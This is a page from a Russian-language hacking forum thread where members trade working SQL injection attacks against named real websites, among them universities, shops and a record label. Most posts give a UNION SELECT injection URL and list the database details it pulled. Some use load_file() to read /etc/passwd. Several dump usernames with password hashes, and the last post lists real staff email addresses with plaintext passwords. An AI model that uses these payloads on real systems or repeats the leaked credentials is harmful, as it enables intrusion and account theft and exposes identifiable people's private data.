HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 687 из 1602 « Первая < 187587637677 683 684 685 686 687 688 689 690 691 6977377871187 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.12.2008, 12:20
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию
http://www.grid.iu.edu/news/news.php?id=9999+union+select+1,2,3,4,version(),6, 7,8--

rssuser@nukufetau-b

4.1.20-log
Последний раз редактировалось hackmen; 04.12.2008 в 20:25..
 
Ответить с цитированием

  #2  
Старый 04.12.2008, 13:22
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Цитата:
http://malankara.in/diocese.php?id=294
Version: 4.1.20
User: malankara_root@localhost
Dbname: malankara_data

members found in DB
news found in DB

админка по адресу admin
 
Ответить с цитированием

  #3  
Старый 04.12.2008, 14:40
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=1/**/union/**/select/**/1,2,version(),4,5,6/*
Версия MySQL:
5.0.22
-------
Имя базы:
rozymnuk_comua
-------
Юзер:
rozymnuk_comua@localhost
-------
@@version_compile_os:
unknown-freebsd6.0
-------
Таблицы:

catalog
categories
chapters
clipart
clipart_group
orders
orders_goods
orders_old
pweek
recalls
ri_categories
 
Ответить с цитированием

  #4  
Старый 04.12.2008, 16:02
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию
Пашкела. Исправляю... http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=1/**/union/**/select/**/1,2,version(),4,5,6/*

Таблицы:
catalog
categories
chapters
clipart
clipart_group
orders
orders_goods
orders_old
pweek
recalls
ri_categories
ri_prices
saytnews
subscribe
users
  1. pwd
  2. email
  3. nick
voitbase
 
Ответить с цитированием

  #5  
Старый 04.12.2008, 18:55
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829

Репутация: 405
Отправить сообщение для Neoveneficus с помощью ICQ
По умолчанию
Звукозаписывающий лейбл
Код:
http://www.cd-maximum.ru/index.php?lang=ru&hid=999+union+select+1,concat(id,0x3a,name,0x3a,usr,0x3a,passwd)+from+users+limit+0,1/*
Version: 4.0.27
Database: cdmax
User: cdmax@zvm19.host.ru
Последний раз редактировалось Neoveneficus; 04.12.2008 в 20:36..
 
Ответить с цитированием

  #6  
Старый 04.12.2008, 20:17
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию
http://shkola.lv/index.php?mode=lesson&lsnid=-1+union+select+1,2,3,4,5/*
DATABASE: shkola
VERSION: 4.1.21
USER: shkola@localhost
Последний раз редактировалось WAR!9G; 05.12.2008 в 00:57..
 
Ответить с цитированием

  #7  
Старый 04.12.2008, 23:32
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию
http://www.gsd.umn.edu/article.php?id=9999+union+select+database(),versio n(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16--

gsd_main_db
4.1.22-log
gsduser@web.cla.umn.edu

UPD

http://www.assumption.edu/admin/hotnews/story.php?id=99999+union+select+1,username,3,passw ord,5,6,7,8+from+users--

msun:95c90aa47733b9023c318d9914606339

UPD+

http://www.asuci.uci.edu/news/story.php?id=999999+union+select+1,2,3,4,version() ,6,7,8,9,10,11,12,13,14,15,16,17--
5.0.67-community-nt
Последний раз редактировалось hackmen; 05.12.2008 в 02:22..
 
Ответить с цитированием

  #8  
Старый 05.12.2008, 00:15
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
Angry
http://www.feltbikes.de
5.0.32-Debian_7etch6:root@localhost:felt_artikel
http://www.feltbikes.de/cross.php?id=-4+union+select+1,2,3,4,load_file(0x2f7661722f7777772f66656c742f6c69627261 72792e706870),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41/*
------------------------------------------------------------------------
http://www.furisto.de
5.0.32- Debian_7etch5:sk0223 2@localhost:usr_sk02 232_1
http://www.furisto.de/component/option,com_ownbiblio/index.php?option=com_ownbiblio&view=catalogue&year =All&catid=1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users+ limit+1,100/*------------------------------------------------------------------------
http://digital.tomsk.ru
4.0.27-log:digitalwww@localhost
http://digital.tomsk.ru/?IDcatalog=975155&ItemID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
------------------------------------------------------------------------
http://www.diac.ru
http://www.diac.ru/news/comments.php?news_id=-1+union+select+1,2,3,4,5,6,7,8/*
------------------------------------------------------------------------
http://calendar.hpu.edu
Самое вкусное)) - еду!
http://calendar.hpu.edu/event_details.php?event_id=-2555+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40/*
5.0.26-standard:root@localhost:calendar
Подбираем таблицы и колонки!
Еще доступна читалка load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd
load_file(0x2f6574632f706173737764) - function.php
/data0/httpd/calendar/htdocs - Дира!
http://calendar.hpu.edu/admin/ - Админка!
+ Можно перебирать колонки и таблицы! =)
------------------------------------------------------------------------
http://www.roguegovernment.com
4.1.22-standard:roguegov_publicr@localhost:roguegov_rgov
http://www.roguegovernment.com/news.php?id=-4682+union+select+1,2,3,4,5,6/*
------------------------------------------------------------------------
http://www.paristoutcourt.org
5.0.45-Debian_1ubuntu3.3-logaristoutcourtor@88.191.253.131aristoutcourt or
Есть таблица: ptc_users
Поля в таблице: user_login,user_pass,user_email
http://www.paristoutcourt.org/blogs/blog.php?id=7&blog=-1+union+select+1,2,concat_ws(char(58),user_login,user_pass,user_email ),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ptc_user s/* Дальше через limit
------------------------------------------------------------------------
http://www.viaggiavventurenelmondo.it
5.0.45-Debian_1ubuntu3.3-log:anm_sites@172.17.12.13:cdocanm
Таблица: user
Колонки: login,password
http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=1+union+select+1,concat(login,char(58),password),3,4,5,6,7,8,9+from+user/* Дальше через limit
------------------------------------------------------------------------
http://www.kvartira-omsk.ru
5.0.27-standard-log:vashakvartira@localhost:vashakvartira
5ая версия - можно искать таблицы!
------------------------------------------------------------------------
http://www.easybackline.fr
4.1.11-Debian_4sarge7:easybkline@hebergement.oc3.fr:easyb kline
С этим сайтом работае через unhex(hex(...))
------------------------------------------------------------------------
http://www.cliocup.fr
5.0.44-log:root@localhost:wsr
5ая версия! Можно перебирать...
Так же есть читалка через load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd

------------------------------------------------------------------------
Последний раз редактировалось Tigger; 05.12.2008 в 01:33..
 
Ответить с цитированием

  #9  
Старый 05.12.2008, 11:41
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Пора делать ставки на лошадей *). Казино там итд. В общем таблицы не подобрал буду рад если кто нить подберёт.

http://www.gohorsebetting.com/horseracing/news.php?id=1666+union+select+1,version(),user(),d atabase()/*

Version:4.1.20
Database: allhorse
user: dbconnect@localhost


Индийцы отжигают *)

http://www.superbindia.com/audios/player.php?id=-1426/**/union/**/select/**/1,version(),user(),database(),5,6,7--

Database Version: 5.0.51a-community
Database name: nirup_superbindia
User name: nirup_arupreddy@localhost
 
Ответить с цитированием

  #10  
Старый 05.12.2008, 13:45
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Цитата:
http://www.hiva.be/publicatie_detail_en.php?id=1803[sql]
Dbname: hiva_web
Version: 5.0.18-nt
User: admin@localhost

куча таблиц
Цитата:
mysql.user

localhost:admin:08bda1f87564a3c5 hilda
localhost:rik:78a42964266735dd rik
%:root:36b5abe15fece604 142857
localhost:guest:guest
%:admin:08bda1f87564a3c5
%:liesbeth:1913a30641551198
%:elise:6e0fd8903542daf2 elise

table account_paswoord from database steunpunt_loopbanen
id:email:domainaswoord

1:ides.nicaise@hiva.kuleuven.be:centraal:Linabdal
2:hubert.cossey@hiva.kuleuven.be:centraal:Jwaal123
3:sonja.wuyts@hiva.kuleuven.be:centraal:SoWu3110
4:beatrijs.defraine@ped.kuleuven.be:OD1:dummy
5atrick.onghena@ped.kuleuven.be:OD1:bAch3500
6eter.vanpetegem@ua.ac.be:OD1:hlrctal
7ol.ghesquiere@ped.kuleuven.be:OD1:dummy
8:rita.rymenans@ua.ac.be:OD1:retuow
9:lieven.verschaffel@ped.kuleuven.be:OD1:dummy
10:rianne.janssen@ped.kuleuven.be:OD1:Nobo9632
 
Ответить с цитированием
Ответ
Страница 687 из 1602 « Первая < 187587637677 683 684 685 686 687 688 689 690 691 6977377871187 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ